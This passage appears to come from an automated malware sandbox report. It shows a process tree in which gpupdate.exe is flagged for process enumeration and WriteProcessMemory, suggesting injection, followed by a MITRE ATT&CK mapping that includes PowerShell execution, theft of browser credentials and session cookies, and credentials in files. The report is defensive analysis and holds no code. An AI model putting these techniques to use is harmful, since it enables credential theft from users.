    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
    PID:3200
- - C:\Windows\SysWOW64\gpupdate.exe
    C:\Windows\SysWOW64\gpupdate.exe
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:2968

C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
1⤵
PID:400

C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"
1⤵
PID:1384

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Modify Authentication Process

Privilege Escalation

Defense Evasion

Modify Authentication Process

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Modify Authentication Process

Steal Web Session Cookie

T1539

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Peripheral Device Discovery

T1120

Query Registry

System Information Discovery